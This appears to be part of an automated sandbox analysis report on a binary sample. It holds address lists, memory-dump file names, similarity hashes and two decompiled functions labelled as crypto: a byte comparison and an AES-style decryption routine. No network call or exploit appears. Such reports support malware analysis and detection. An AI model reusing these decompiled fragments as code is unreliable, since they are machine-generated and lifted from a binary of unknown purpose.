0x00850051
0x00850053
0x00000000
0x00000000
0x00850059
0x0085005f
0x008500e6
0x008500e8
0x008500ea
0x008500f8
0x008500fa
0x00850107
0x00850107
0x008500fa
0x00000000
0x008500ea
0x0085006c
0x0085006e
0x00850086
0x0085008e
0x00850090
0x008500a8
0x008500b0
0x008500b2
0x008500ca
0x008500d2
0x008500d4
0x008500dd
0x008500dd
0x00000000
0x008500d4
0x008500bb
0x008500c4
0x00000000
0x00000000
0x00000000
0x008500c4
0x00850099
0x008500a2
0x00000000
0x00000000
0x00000000
0x008500a2
0x00850077
0x00850080
0x00000000
0x00000000
0x00000000
0x00850080
0x0084ffd5
0x0084ffd7
0x0084ffef
0x0084fff7
0x0084fff9
0x00850011
0x00850019
0x0085001b
0x00850033
0x0085003b
0x0085003d
0x00850046
0x00850046
0x00000000
0x0085003d
0x00850024
0x0085002d
0x00000000
0x00000000
0x00000000
0x0085002d
0x00850002
0x0085000b
0x00000000
0x00000000
0x00000000
0x0085000b
0x0084ffe0
0x0084ffe9
0x00000000
0x00000000
0x00000000
0x0084ffe9
0x0084ff3d
0x0084ff3f
0x0084ff57
0x0084ff5f
0x0084ff61
0x0084ff79
0x0084ff81
0x0084ff83
0x0084ff9b
0x0084ffa3
0x0084ffa5
0x0084ffae
0x0084ffae
0x00000000
0x0084ffa5
0x0084ff8c
0x0084ff95
0x00000000
0x00000000
0x00000000
0x0084ff95
0x0084ff6a
0x0084ff73
0x00000000
0x00000000
0x00000000
0x0084ff73
0x0084ff48
0x0084ff51
0x00000000
0x00000000
0x00000000
0x0084ff51
0x0084fea6
0x0084fea8
0x0084fec0
0x0084fec8
0x0084feca
0x0084fee2
0x0084feea
0x0084feec
0x0084ff04
0x0084ff0c
0x0084ff0e
0x0084ff17
0x0084ff17
0x00000000
0x0084ff0e
0x0084fef5
0x0084fefe
0x00000000
0x00000000
0x00000000
0x0084fefe
0x0084fed3
0x0084fedc
0x00000000
0x00000000
0x00000000
0x0084fedc
0x0084feb1
0x0084feba
0x00000000
0x00000000
0x00000000
0x0084feba
0x0084fe0f
0x0084fe11
0x0084fe29
0x0084fe31
0x0084fe33
0x0084fe4b
0x0084fe53
0x0084fe55
0x0084fe6d
0x0084fe75
0x0084fe77
0x0084fe80
0x0084fe80
0x00000000
0x0084fe77
0x0084fe5e
0x0084fe67
0x00000000
0x00000000
0x00000000
0x0084fe67
0x0084fe3c
0x0084fe45
0x00000000
0x00000000
0x00000000
0x0084fe45
0x0084fe1a
0x0084fe23
0x00000000
0x00000000
0x00000000
0x0084fe23
0x0084fd78
0x0084fd7a
0x0084fd92
0x0084fd9a
0x0084fd9c
0x0084fdb4
0x0084fdbc
0x0084fdbe
0x0084fdd6
0x0084fdde
0x0084fde0
0x0084fde9
0x0084fde9
0x00000000
0x0084fde0
0x0084fdc7
0x0084fdd0
0x00000000
0x00000000
0x00000000
0x0084fdd0
0x0084fda5
0x0084fdae
0x00000000
0x00000000
0x00000000
0x0084fdae
0x0084fd83
0x0084fd8c
0x00000000
0x00000000
0x00000000
0x0084fce6
0x0084fce6
0x0084fced
0x0084fcef
0x0084fd03
0x0084fd03
0x0084fd0b
0x0084fd0d
0x0084fd21
0x0084fd21
0x0084fd29
0x0084fd2b
0x0084fd3f
0x0084fd3f
0x0084fd47
0x0084fd49
0x0084fd52
0x0084fd52
0x00000000
0x0084fd49
0x0084fd31
0x0084fd34
0x0084fd3d
0x00000000
0x00000000
0x00000000
0x0084fd3d
0x0084fd13
0x0084fd16
0x0084fd1f
0x00000000
0x00000000
0x00000000
0x0084fd1f
0x0084fcf5
0x0084fcf8
0x0084fd01
0x00000000
0x00000000
0x00000000
0x0084fd01
0x0084fcd6
0x0084fcd6
0x00850ac7

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction ID: 8a791b3d0287f0d8115e649a98e08b1d0c1558fc42cbb40871ec0c27798ee8e1
Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
Instruction Fuzzy Hash: EFC1857220516B0BDF2D4639857413EFAA1FBA27B131A077DD9B2CB1D6FE10C568D620

Uniqueness

Uniqueness Score: -1.00%

Function 0084F8C6, Relevance: .3, Instructions: 323
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0084F8C6(void* __edx, void* __esi) {
				signed char _t177;
				void* _t178;
				signed char _t179;
				signed char _t180;
				signed char _t181;
				signed char _t183;
				signed char _t184;
				void* _t228;
				void* _t278;
				void* _t281;
				void* _t283;
				void* _t285;
				void* _t287;
				void* _t289;
				void* _t291;
				void* _t293;
				void* _t295;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t305;
				void* _t307;
				void* _t309;
				void* _t311;
				void* _t313;
				void* _t315;
				void* _t317;
				void* _t319;
				void* _t321;
				void* _t322;

				_t322 = __esi;
				_t278 = __edx;
				_t177 =  *(__esi - 0x1c);
				if(_t177 ==  *(__edx - 0x1c)) {
					_t228 = 0;
					L10:
					if(_t228 != 0) {
						L78:
						_t178 = _t228;
						return _t178;
					}
					_t179 =  *(_t322 - 0x18);
					if(_t179 ==  *(_t278 - 0x18)) {
						_t228 = 0;
						L21:
						if(_t228 != 0) {
							goto L78;
						}
						_t180 =  *(_t322 - 0x14);
						if(_t180 ==  *(_t278 - 0x14)) {
							_t228 = 0;
							L32:
							if(_t228 != 0) {
								goto L78;
							}
							_t181 =  *(_t322 - 0x10);
							if(_t181 ==  *(_t278 - 0x10)) {
								_t228 = 0;
								L43:
								if(_t228 != 0) {
									goto L78;
								}
								if( *(_t322 - 0xc) ==  *(_t278 - 0xc)) {
									_t228 = 0;
									L54:
									if(_t228 != 0) {
										goto L78;
									}
									_t183 =  *(_t322 - 8);
									if(_t183 ==  *(_t278 - 8)) {
										_t228 = 0;
										L65:
										if(_t228 != 0) {
											goto L78;
										}
										_t184 =  *(_t322 - 4);
										if(_t184 ==  *(_t278 - 4)) {
											_t228 = 0;
											L76:
											if(_t228 == 0) {
												_t228 = 0;
											}
											goto L78;
										}
										_t281 = (_t184 & 0x000000ff) - ( *(_t278 - 4) & 0x000000ff);
										if(_t281 == 0) {
											L69:
											_t283 = ( *(_t322 - 3) & 0x000000ff) - ( *(_t278 - 3) & 0x000000ff);
											if(_t283 == 0) {
												L71:
												_t285 = ( *(_t322 - 2) & 0x000000ff) - ( *(_t278 - 2) & 0x000000ff);
												if(_t285 == 0) {
													L73:
													_t228 = ( *(_t322 - 1) & 0x000000ff) - ( *(_t278 - 1) & 0x000000ff);
													if(_t228 != 0) {
														_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
													}
													goto L76;
												}
												_t228 = (0 | _t285 > 0x00000000) * 2 - 1;
												if(_t228 != 0) {
													goto L78;
												}
												goto L73;
											}
											_t228 = (0 | _t283 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L71;
										}
										_t228 = (0 | _t281 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L69;
									}
									_t287 = (_t183 & 0x000000ff) - ( *(_t278 - 8) & 0x000000ff);
									if(_t287 == 0) {
										L58:
										_t289 = ( *(_t322 - 7) & 0x000000ff) - ( *(_t278 - 7) & 0x000000ff);
										if(_t289 == 0) {
											L60:
											_t291 = ( *(_t322 - 6) & 0x000000ff) - ( *(_t278 - 6) & 0x000000ff);
											if(_t291 == 0) {
												L62:
												_t228 = ( *(_t322 - 5) & 0x000000ff) - ( *(_t278 - 5) & 0x000000ff);
												if(_t228 != 0) {
													_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
												}
												goto L65;
											}
											_t228 = (0 | _t291 > 0x00000000) * 2 - 1;
											if(_t228 != 0) {
												goto L78;
											}
											goto L62;
										}
										_t228 = (0 | _t289 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L60;
									}
									_t228 = (0 | _t287 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L58;
								}
								_t293 = ( *(_t322 - 0xc) & 0x000000ff) - ( *(_t278 - 0xc) & 0x000000ff);
								if(_t293 == 0) {
									L47:
									_t295 = ( *(_t322 - 0xb) & 0x000000ff) - ( *(_t278 - 0xb) & 0x000000ff);
									if(_t295 == 0) {
										L49:
										_t297 = ( *(_t322 - 0xa) & 0x000000ff) - ( *(_t278 - 0xa) & 0x000000ff);
										if(_t297 == 0) {
											L51:
											_t228 = ( *(_t322 - 9) & 0x000000ff) - ( *(_t278 - 9) & 0x000000ff);
											if(_t228 != 0) {
												_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
											}
											goto L54;
										}
										_t228 = (0 | _t297 > 0x00000000) * 2 - 1;
										if(_t228 != 0) {
											goto L78;
										}
										goto L51;
									}
									_t228 = (0 | _t295 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L49;
								}
								_t228 = (0 | _t293 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L47;
							}
							_t299 = (_t181 & 0x000000ff) - ( *(_t278 - 0x10) & 0x000000ff);
							if(_t299 == 0) {
								L36:
								_t301 = ( *(_t322 - 0xf) & 0x000000ff) - ( *(_t278 - 0xf) & 0x000000ff);
								if(_t301 == 0) {
									L38:
									_t303 = ( *(_t322 - 0xe) & 0x000000ff) - ( *(_t278 - 0xe) & 0x000000ff);
									if(_t303 == 0) {
										L40:
										_t228 = ( *(_t322 - 0xd) & 0x000000ff) - ( *(_t278 - 0xd) & 0x000000ff);
										if(_t228 != 0) {
											_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
										}
										goto L43;
									}
									_t228 = (0 | _t303 > 0x00000000) * 2 - 1;
									if(_t228 != 0) {
										goto L78;
									}
									goto L40;
								}
								_t228 = (0 | _t301 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L38;
							}
							_t228 = (0 | _t299 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L36;
						}
						_t305 = (_t180 & 0x000000ff) - ( *(_t278 - 0x14) & 0x000000ff);
						if(_t305 == 0) {
							L25:
							_t307 = ( *(_t322 - 0x13) & 0x000000ff) - ( *(_t278 - 0x13) & 0x000000ff);
							if(_t307 == 0) {
								L27:
								_t309 = ( *(_t322 - 0x12) & 0x000000ff) - ( *(_t278 - 0x12) & 0x000000ff);
								if(_t309 == 0) {
									L29:
									_t228 = ( *(_t322 - 0x11) & 0x000000ff) - ( *(_t278 - 0x11) & 0x000000ff);
									if(_t228 != 0) {
										_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
									}
									goto L32;
								}
								_t228 = (0 | _t309 > 0x00000000) * 2 - 1;
								if(_t228 != 0) {
									goto L78;
								}
								goto L29;
							}
							_t228 = (0 | _t307 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L27;
						}
						_t228 = (0 | _t305 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L25;
					}
					_t311 = (_t179 & 0x000000ff) - ( *(_t278 - 0x18) & 0x000000ff);
					if(_t311 == 0) {
						L14:
						_t313 = ( *(_t322 - 0x17) & 0x000000ff) - ( *(_t278 - 0x17) & 0x000000ff);
						if(_t313 == 0) {
							L16:
							_t315 = ( *(_t322 - 0x16) & 0x000000ff) - ( *(_t278 - 0x16) & 0x000000ff);
							if(_t315 == 0) {
								L18:
								_t228 = ( *(_t322 - 0x15) & 0x000000ff) - ( *(_t278 - 0x15) & 0x000000ff);
								if(_t228 != 0) {
									_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
								}
								goto L21;
							}
							_t228 = (0 | _t315 > 0x00000000) * 2 - 1;
							if(_t228 != 0) {
								goto L78;
							}
							goto L18;
						}
						_t228 = (0 | _t313 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L16;
					}
					_t228 = (0 | _t311 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L14;
				}
				_t317 = (_t177 & 0x000000ff) - ( *(__edx - 0x1c) & 0x000000ff);
				if(_t317 == 0) {
					L3:
					_t319 = ( *(_t322 - 0x1b) & 0x000000ff) - ( *(_t278 - 0x1b) & 0x000000ff);
					if(_t319 == 0) {
						L5:
						_t321 = ( *(_t322 - 0x1a) & 0x000000ff) - ( *(_t278 - 0x1a) & 0x000000ff);
						if(_t321 == 0) {
							L7:
							_t228 = ( *(_t322 - 0x19) & 0x000000ff) - ( *(_t278 - 0x19) & 0x000000ff);
							if(_t228 != 0) {
								_t228 = (0 | _t228 > 0x00000000) * 2 - 1;
							}
							goto L10;
						}
						_t228 = (0 | _t321 > 0x00000000) * 2 - 1;
						if(_t228 != 0) {
							goto L78;
						}
						goto L7;
					}
					_t228 = (0 | _t319 > 0x00000000) * 2 - 1;
					if(_t228 != 0) {
						goto L78;
					}
					goto L5;
				}
				_t228 = (0 | _t317 > 0x00000000) * 2 - 1;
				if(_t228 != 0) {
					goto L78;
				}
				goto L3;
			}

0x0084f8c6
0x0084f8c6
0x0084f8c6
0x0084f8cc
0x0084f953
0x0084f955
0x0084f957
0x0084fcd6
0x0084fcd6
0x00850ac7
0x00850ac7
0x0084f95d
0x0084f963
0x0084f9ea
0x0084f9ec
0x0084f9ee
0x00000000
0x00000000
0x0084f9f4
0x0084f9fa
0x0084fa81
0x0084fa83
0x0084fa85
0x00000000
0x00000000
0x0084fa8b
0x0084fa91
0x0084fb18
0x0084fb1a
0x0084fb1c
0x00000000
0x00000000
0x0084fb28
0x0084fbb0
0x0084fbb2
0x0084fbb4
0x00000000
0x00000000
0x0084fbba
0x0084fbc0
0x0084fc47
0x0084fc49
0x0084fc4b
0x00000000
0x00000000
0x0084fc51
0x0084fc57
0x0084fcce
0x0084fcd0
0x0084fcd2
0x0084fcd4
0x0084fcd4
0x00000000
0x0084fcd2
0x0084fc60
0x0084fc62
0x0084fc76
0x0084fc7e
0x0084fc80
0x0084fc94
0x0084fc9c
0x0084fc9e
0x0084fcb2
0x0084fcba
0x0084fcbc
0x0084fcc5
0x0084fcc5
0x00000000
0x0084fcbc
0x0084fca7
0x0084fcb0
0x00000000
0x00000000
0x00000000
0x0084fcb0
0x0084fc89
0x0084fc92
0x00000000
0x00000000
0x00000000
0x0084fc92
0x0084fc6b
0x0084fc74
0x00000000
0x00000000
0x00000000
0x0084fc74
0x0084fbcd
0x0084fbcf
0x0084fbe7
0x0084fbef
0x0084fbf1
0x0084fc09
0x0084fc11
0x0084fc13
0x0084fc2b
0x0084fc33
0x0084fc35
0x0084fc3e
0x0084fc3e
0x00000000
0x0084fc35
0x0084fc1c
0x0084fc25
0x00000000
0x00000000
0x00000000
0x0084fc25
0x0084fbfa
0x0084fc03
0x00000000
0x00000000
0x00000000
0x0084fc03
0x0084fbd8
0x0084fbe1
0x00000000
0x00000000
0x00000000
0x0084fbe1
0x0084fb36
0x0084fb38
0x0084fb50
0x0084fb58
0x0084fb5a
0x0084fb72
0x0084fb7a
0x0084fb7c
0x0084fb94
0x0084fb9c
0x0084fb9e
0x0084fba7
0x0084fba7
0x00000000
0x0084fb9e
0x0084fb85
0x0084fb8e
0x00000000
0x00000000
0x00000000
0x0084fb8e
0x0084fb63
0x0084fb6c
0x00000000
0x00000000
0x00000000
0x0084fb6c
0x0084fb41
0x0084fb4a
0x00000000
0x00000000
0x00000000
0x0084fb4a
0x0084fa9e
0x0084faa0
0x0084fab8
0x0084fac0
0x0084fac2
0x0084fada
0x0084fae2
0x0084fae4
0x0084fafc
0x0084fb04
0x0084fb06
0x0084fb0f
0x0084fb0f
0x00000000
0x0084fb06
0x0084faed
0x0084faf6
0x00000000
0x00000000
0x00000000
0x0084faf6
0x0084facb
0x0084fad4
0x00000000
0x00000000
0x00000000
0x0084fad4
0x0084faa9
0x0084fab2
0x00000000
0x00000000
0x00000000
0x0084fab2
0x0084fa07
0x0084fa09
0x0084fa21
0x0084fa29
0x0084fa2b
0x0084fa43
0x0084fa4b
0x0084fa4d
0x0084fa65
0x0084fa6d
0x0084fa6f
0x0084fa78
0x0084fa78
0x00000000
0x0084fa6f
0x0084fa56
0x0084fa5f
0x00000000
0x00000000
0x00000000
0x0084fa5f
0x0084fa34
0x0084fa3d
0x00000000
0x00000000
0x00000000
0x0084fa3d
0x0084fa12
0x0084fa1b
0x00000000
0x00000000
0x00000000
0x0084fa1b
0x0084f970
0x0084f972
0x0084f98a
0x0084f992
0x0084f994
0x0084f9ac
0x0084f9b4
0x0084f9b6
0x0084f9ce
0x0084f9d6
0x0084f9d8
0x0084f9e1
0x0084f9e1
0x00000000
0x0084f9d8
0x0084f9bf
0x0084f9c8
0x00000000
0x00000000
0x00000000
0x0084f9c8
0x0084f99d
0x0084f9a6
0x00000000
0x00000000
0x00000000
0x0084f9a6
0x0084f97b
0x0084f984
0x00000000
0x00000000
0x00000000
0x0084f984
0x0084f8d9
0x0084f8db
0x0084f8f3
0x0084f8fb
0x0084f8fd
0x0084f915
0x0084f91d
0x0084f91f
0x0084f937
0x0084f93f
0x0084f941
0x0084f94a
0x0084f94a
0x00000000
0x0084f941
0x0084f928
0x0084f931
0x00000000
0x00000000
0x00000000
0x0084f931
0x0084f906
0x0084f90f
0x00000000
0x00000000
0x00000000
0x0084f90f
0x0084f8e4
0x0084f8ed
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true

Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction ID: 74a5a3a58b38e09f04821bcdea36266149289003c9989ab63a9fc26994a51586
Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
Instruction Fuzzy Hash: 6BC173722051AB0ADF2D8639C57413EBAA1FBA27B131A177DD9B2CB1C6FE20C524D610

Uniqueness

Uniqueness Score: -1.00%

Function 0083DF48, Relevance: .3, Instructions: 318
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E0083DF48(void* __ebx, intOrPtr __ecx, void* __esi) {
				void* _t222;
				signed int _t229;
				signed char _t253;
				signed int _t301;
				signed int* _t304;
				signed int* _t309;
				unsigned int _t313;
				signed char _t348;
				unsigned int _t350;
				signed int _t353;
				unsigned int _t356;
				signed int* _t359;
				signed int _t363;
				signed int _t368;
				signed int _t372;
				signed int _t376;
				signed char _t378;
				signed int* _t382;
				signed int _t388;
				signed int _t394;
				signed int _t399;
				intOrPtr _t400;
				signed char _t402;
				signed char _t403;
				signed char _t404;
				unsigned int _t406;
				signed int _t409;
				signed int _t411;
				unsigned int _t412;
				unsigned int _t414;
				unsigned int _t415;
				signed int _t416;
				signed int _t421;
				void* _t422;
				unsigned int _t423;
				signed int _t426;
				intOrPtr _t429;
				signed int* _t430;
				void* _t431;
				void* _t432;

				_t414 =  *(_t431 + 0x64);
				_t429 = __ecx;
				 *((intOrPtr*)(_t431 + 0x1c)) = __ecx;
				if(_t414 != 0) {
					_t415 = _t414 >> 4;
					 *(_t431 + 0x64) = _t415;
					if( *((char*)(__ecx)) == 0) {
						 *((intOrPtr*)(_t431 + 0x30)) = __ecx + 8;
						E0084EA80(_t431 + 0x54, __ecx + 8, 0x10);
						_t432 = _t431 + 0xc;
						if(_t415 == 0) {
							L13:
							return E0084EA80( *((intOrPtr*)(_t432 + 0x30)), _t432 + 0x50, 0x10);
						}
						_t399 =  *(_t432 + 0x60);
						 *(_t432 + 0x1c) = _t399 + 8;
						_t229 =  *(_t432 + 0x70);
						_t400 = _t399 - _t229;
						 *((intOrPtr*)(_t432 + 0x2c)) = _t400;
						_t359 = _t229 + 8;
						 *(_t432 + 0x20) = _t359;
						do {
							_t421 =  *(_t429 + 4);
							 *(_t432 + 0x28) = _t359 + _t400 + 0xfffffff8;
							E0083DF13(_t432 + 0x4c, _t359 + _t400 + 0xfffffff8, (_t421 << 4) + 0x18 + _t429);
							_t402 =  *(_t432 + 0x44);
							 *(_t432 + 0x68) =  *(0x875350 + (_t402 & 0x000000ff) * 4) ^  *(0x875f50 + ( *(_t432 + 0x4b) & 0x000000ff) * 4) ^  *(0x875b50 + ( *(_t432 + 0x4e) & 0x000000ff) * 4);
							_t348 =  *(_t432 + 0x50);
							_t363 =  *(_t432 + 0x68) ^  *(0x875750 + (_t348 & 0x000000ff) * 4);
							 *(_t432 + 0x68) = _t363;
							 *(_t432 + 0x34) = _t363;
							_t403 =  *(_t432 + 0x48);
							_t368 =  *(0x875750 + (_t402 & 0x000000ff) * 4) ^  *(0x875350 + (_t403 & 0x000000ff) * 4) ^  *(0x875f50 + ( *(_t432 + 0x4f) & 0x000000ff) * 4) ^  *(0x875b50 + ( *(_t432 + 0x52) & 0x000000ff) * 4);
							 *(_t432 + 0x70) = _t368;
							 *(_t432 + 0x38) = _t368;
							_t404 =  *(_t432 + 0x4c);
							 *(_t432 + 0x10) =  *(0x875b50 + ( *(_t432 + 0x46) & 0x000000ff) * 4) ^  *(0x875750 + (_t403 & 0x000000ff) * 4);
							_t372 =  *(_t432 + 0x10) ^  *(0x875350 + (_t404 & 0x000000ff) * 4) ^  *(0x875f50 + ( *(_t432 + 0x53) & 0x000000ff) * 4);
							 *(_t432 + 0x10) = _t372;
							 *(_t432 + 0x3c) = _t372;
							 *(_t432 + 0x14) =  *(0x875f50 + ( *(_t432 + 0x47) & 0x000000ff) * 4) ^  *(0x875b50 + ( *(_t432 + 0x4a) & 0x000000ff) * 4);
							_t376 =  *(_t432 + 0x14) ^  *(0x875750 + (_t404 & 0x000000ff) * 4) ^  *(0x875350 + (_t348 & 0x000000ff) * 4);
							_t422 = _t421 - 1;
							 *(_t432 + 0x14) = _t376;
							 *(_t432 + 0x40) = _t376;
							if(_t422 <= 1) {
								goto L9;
							}
							_t416 =  *(_t432 + 0x68);
							_t309 = (_t422 + 2 << 4) + _t429;
							 *(_t432 + 0x14) = _t309;
							_t430 = _t309;
							 *((intOrPtr*)(_t432 + 0x18)) = _t422 - 1;
							do {
								_t411 =  *_t430;
								 *(_t432 + 0x68) =  *(_t430 - 8) ^ _t416;
								_t430 = _t430 - 0x10;
								_t313 = _t430[5] ^ _t376;
								_t412 = _t411 ^  *(_t432 + 0x10);
								 *(_t432 + 0x14) = _t313;
								_t356 = _t430[3] ^  *(_t432 + 0x70);
								_t416 =  *(0x875750 + (_t313 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x875b50 + (_t412 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x875f50 + (_t356 >> 0x18) * 4) ^  *(0x875350 + ( *(_t432 + 0x68) & 0x000000ff) * 4);
								 *(_t432 + 0x34) = _t416;
								 *(_t432 + 0x70) =  *(0x875b50 + ( *(_t432 + 0x14) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x875f50 + (_t412 >> 0x18) * 4);
								_t388 =  *(_t432 + 0x70) ^  *(0x875750 + ( *(_t432 + 0x68) >> 0x00000008 & 0x000000ff) * 4) ^  *(0x875350 + (_t356 & 0x000000ff) * 4);
								 *(_t432 + 0x70) = _t388;
								 *(_t432 + 0x38) = _t388;
								_t394 =  *(0x875f50 + ( *(_t432 + 0x14) >> 0x18) * 4) ^  *(0x875750 + (_t356 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x875b50 + ( *(_t432 + 0x68) >> 0x00000010 & 0x000000ff) * 4) ^  *(0x875350 + (_t412 & 0x000000ff) * 4);
								 *(_t432 + 0x10) = _t394;
								 *(_t432 + 0x3c) = _t394;
								_t376 =  *(0x875750 + (_t412 >> 0x00000008 & 0x000000ff) * 4) ^  *(0x875b50 + (_t356 >> 0x00000010 & 0x000000ff) * 4) ^  *(0x875f50 + ( *(_t432 + 0x68) >> 0x18) * 4) ^  *(0x875350 + ( *(_t432 + 0x14) & 0x000000ff) * 4);
								_t135 = _t432 + 0x18;
								 *_t135 =  *((intOrPtr*)(_t432 + 0x18)) - 1;
								 *(_t432 + 0x40) = _t376;
							} while ( *_t135 != 0);
							_t429 =  *((intOrPtr*)(_t432 + 0x24));
							 *(_t432 + 0x68) = _t416;
							_t415 =  *(_t432 + 0x6c);
							 *(_t432 + 0x14) = _t376;
							L9:
							_t253 =  *(_t429 + 0x28) ^  *(_t432 + 0x68);
							 *(_t432 + 0x6c) = _t253;
							 *(_t432 + 0x44) = _t253;
							_t378 =  *(_t429 + 0x34) ^  *(_t432 + 0x14);
							 *(_t432 + 0x34) =  *((intOrPtr*)((_t253 & 0x000000ff) + 0x874230));
							_t406 =  *(_t429 + 0x30) ^  *(_t432 + 0x10);
							_t350 =  *(_t429 + 0x2c) ^  *(_t432 + 0x70);
							 *((char*)(_t432 + 0x35)) =  *((intOrPtr*)((_t378 >> 0x00000008 & 0x000000ff) + 0x874230));
							_t423 =  *(_t432 + 0x6c);
							 *(_t432 + 0x4c) = _t406;
							 *(_t432 + 0x48) = _t350;
							 *((char*)(_t432 + 0x36)) =  *((intOrPtr*)((_t406 >> 0x00000010 & 0x000000ff) + 0x874230));
							 *(_t432 + 0x50) = _t378;
							 *((char*)(_t432 + 0x37)) =  *((intOrPtr*)((_t350 >> 0x18) + 0x874230));
							 *(_t432 + 0x38) =  *((intOrPtr*)((_t350 & 0x000000ff) + 0x874230));
							 *((char*)(_t432 + 0x39)) =  *((intOrPtr*)((_t423 >> 0x00000008 & 0x000000ff) + 0x874230));
							 *((char*)(_t432 + 0x3a)) =  *((intOrPtr*)((_t378 >> 0x00000010 & 0x000000ff) + 0x874230));
							_t170 = (_t406 >> 0x18) + 0x874230; // 0x54cbe9de
							 *((char*)(_t432 + 0x3b)) =  *_t170;
							 *(_t432 + 0x3c) =  *((intOrPtr*)((_t406 & 0x000000ff) + 0x874230));
							 *((char*)(_t432 + 0x3d)) =  *((intOrPtr*)((_t350 >> 0x00000008 & 0x000000ff) + 0x874230));
							 *((char*)(_t432 + 0x3e)) =  *((intOrPtr*)((_t423 >> 0x00000010 & 0x000000ff) + 0x874230));
							 *((char*)(_t432 + 0x3f)) =  *((intOrPtr*)((_t378 >> 0x18) + 0x874230));
							 *(_t432 + 0x40) =  *((intOrPtr*)((_t378 & 0x000000ff) + 0x874230));
							_t409 =  *(_t432 + 0x34) ^  *(_t429 + 0x18);
							 *((char*)(_t432 + 0x41)) =  *((intOrPtr*)((_t406 >> 0x00000008 & 0x000000ff) + 0x874230));
							 *((char*)(_t432 + 0x42)) =  *((intOrPtr*)((_t350 >> 0x00000010 & 0x000000ff) + 0x874230));
							 *((char*)(_t432 + 0x43)) =  *((intOrPtr*)((_t423 >> 0x18) + 0x874230));
							_t301 =  *(_t432 + 0x40) ^  *(_t429 + 0x24);
							_t426 =  *(_t432 + 0x38) ^  *(_t429 + 0x1c);
							_t353 =  *(_t432 + 0x3c) ^  *(_t429 + 0x20);
							 *(_t432 + 0x6c) = _t301;
							if( *((char*)(_t429 + 1)) != 0) {
								_t409 = _t409 ^  *(_t432 + 0x54);
								_t426 = _t426 ^  *(_t432 + 0x58);
								_t353 = _t353 ^  *(_t432 + 0x5c);
								 *(_t432 + 0x6c) = _t301 ^  *(_t432 + 0x60);
							}
							 *(_t432 + 0x54) =  *( *(_t432 + 0x28));
							_t304 =  *(_t432 + 0x1c);
							 *(_t432 + 0x58) =  *(_t304 - 4);
							 *(_t432 + 0x5c) =  *_t304;
							 *(_t432 + 0x60) = _t304[1];
							_t382 =  *(_t432 + 0x20);
							 *(_t432 + 0x1c) =  &(_t304[4]);
							 *(_t382 - 8) = _t409;
							_t382[1] =  *(_t432 + 0x6c);
							_t400 =  *((intOrPtr*)(_t432 + 0x2c));
							 *(_t382 - 4) = _t426;
							 *_t382 = _t353;
							_t359 =  &(_t382[4]);
							_t415 = _t415 - 1;
							 *(_t432 + 0x20) = _t359;
							 *(_t432 + 0x6c) = _t415;
						} while (_t415 != 0);
						goto L13;
					}
					return E0083E40A(__ecx,  *((intOrPtr*)(_t431 + 0x68)), _t415,  *((intOrPtr*)(_t431 + 0x68)));
				}
				return _t222;
			}

0x0083df4d
0x0083df51
0x0083df53
0x0083df59
0x0083df5f
0x0083df66
0x0083df6a
0x0083df85
0x0083df8e
0x0083df93
0x0083df98
0x0083e3ef
0x00000000
0x0083e3ff
0x0083df9e
0x0083dfa7
0x0083dfab
0x0083dfaf
0x0083dfb1
0x0083dfb5
0x0083dfb8
0x0083dfbc
0x0083dfbc
0x0083dfcc
0x0083dfd9
0x0083dfde
0x0083e004
0x0083e008
